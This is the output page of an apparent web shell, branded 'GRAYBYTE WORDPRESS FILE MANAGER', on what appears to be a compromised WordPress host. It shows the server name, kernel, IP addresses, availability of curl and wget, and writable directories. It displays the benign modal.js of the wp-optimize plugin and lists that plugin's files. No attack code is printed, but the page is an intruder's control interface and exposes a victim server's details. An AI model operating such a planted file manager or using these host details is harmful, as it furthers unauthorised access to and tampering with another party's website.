✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.128
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/tdhomesa/public_html/wp-content/plugins/wp-optimize/js//modal.js
/*
How to use the modal

wp_optimize.modal.open({
	className: 'a-class', // A class name, added to the main modal container
	events: {}, // An object containing the events added to the modal. See Backbonejs View events syntax.
	content: function() {
		return ''; // the Content method returns html or jQuery objects which will be added to the content area of the modal
	},
	... // Other methods used by the custom events
})
*/

var wp_optimize = window.wp_optimize || {};

// WordPress v4.9 uses Backbone v1.3.3, which does not support the preinitialize() hook.
// Therefore, we are adding a patch to enable support for the preinitialize() hook.
(function() {
	var OriginalView = Backbone.View;
	Backbone.View = function(options) {
		if (typeof this.preinitialize === 'function') {
		this.preinitialize.apply(this, arguments);
		}
		return OriginalView.apply(this, arguments);
	};
	Backbone.View.prototype = OriginalView.prototype;
	Backbone.View.extend = OriginalView.extend;
})();

(function($, wp) {
	'use strict';
	var modal = {};
	modal.views = {};

	/**
	 * Main modal View
	 */
	modal.views.modal = Backbone.View.extend({
		tagName: 'div',
		template: wp.template('wpo-modal'),
		/**
		 * Extend default values
		 */
		preinitialize: function() {
			this.events = _.extend(this.events || {}, {
				'click .wpo-modal--close': 'close'
			});
			this.className = this.className ? 'wpo-modal--container ' + this.className : 'wpo-modal--container ';
		},
		render: function() {
			this.$el.append(this.template());
			this.trigger('rendered');
		},
		initialize: function() {
			this.trigger('initialize');
			this.render();
			this.$content = this.$el.find('.wpo-modal--content');
			// Append the content area with the content provided by the child object
			if ('function' === typeof this.content) {
				this.$content.append(this.content());
			}
		},
		close: function() {
			$('body').removeClass('wpo-modal-is-opened');
			this.remove();
		}
	});

	/**
	 * Public method to create and open the modal
	 */
	modal.open = function(options) {
		var view_options = _.extend(options || {}, {});
		var modalView = modal.views.modal.extend(view_options);
		var m = new modalView();
		m.$el.appendTo('body');
		m.$('.wpo-modal').focus();
		$('body').addClass('wpo-modal-is-opened');
		return m;
	}

	wp_optimize.modal = modal;
})(jQuery, window.wp);


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
22 Jun 2026 6.38 AM
tdhomesa / tdhomesa
0755
handlebars
--
5 Jun 2026 10.08 AM
tdhomesa / tdhomesa
0755
jszip
--
5 Jun 2026 10.08 AM
tdhomesa / tdhomesa
0755
serialize-json
--
5 Jun 2026 10.08 AM
tdhomesa / tdhomesa
0755
sortable
--
5 Jun 2026 10.08 AM
tdhomesa / tdhomesa
0755
blockUI-4-5-5.min.js
0.645 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
blockUI.js
1.313 KB
25 May 2026 12.53 PM
tdhomesa / tdhomesa
0644
cache-4-5-5.min.js
8.029 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
cache.js
15.287 KB
25 Mar 2026 2.42 PM
tdhomesa / tdhomesa
0644
delay-js-4-5-5.min.js
1.16 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
delay-js.js
5.446 KB
21 Apr 2026 8.53 PM
tdhomesa / tdhomesa
0644
heartbeat-4-5-5.min.js
2.781 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
heartbeat.js
7.522 KB
22 Oct 2024 10.25 PM
tdhomesa / tdhomesa
0644
loadAsync-4-5-5.min.js
0.297 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
loadAsync.js
0.654 KB
27 Mar 2020 7.42 PM
tdhomesa / tdhomesa
0644
loadCSS-4-5-5.min.js
0.799 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
loadCSS.js
3.046 KB
27 Mar 2020 7.42 PM
tdhomesa / tdhomesa
0644
minify-4-5-5.min.js
12.531 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
minify.js
23.036 KB
25 Mar 2026 2.42 PM
tdhomesa / tdhomesa
0644
modal-4-5-5.min.js
1.132 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
modal.js
2.293 KB
18 Nov 2025 5.53 PM
tdhomesa / tdhomesa
0644
queue-4-5-5.min.js
0.682 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
queue.js
3.567 KB
24 Sep 2025 2.04 AM
tdhomesa / tdhomesa
0644
send-command-4-5-5.min.js
2.579 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
send-command.js
5.878 KB
12 Aug 2024 2.02 PM
tdhomesa / tdhomesa
0644
status-4-5-5.min.js
3.615 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
status.js
7.019 KB
24 Sep 2025 2.04 AM
tdhomesa / tdhomesa
0644
wpo-images-view-4-5-5.min.js
7.334 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
wpo-images-view.js
15.58 KB
22 Oct 2024 10.25 PM
tdhomesa / tdhomesa
0644
wpoadmin-4-5-5.min.js
37.792 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
wpoadmin.js
76.408 KB
25 Mar 2026 2.42 PM
tdhomesa / tdhomesa
0644
wposmush-4-5-5.min.js
21.637 KB
5 Jun 2026 10.44 AM
tdhomesa / tdhomesa
0644
wposmush.js
46.05 KB
25 May 2026 12.53 PM
tdhomesa / tdhomesa
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF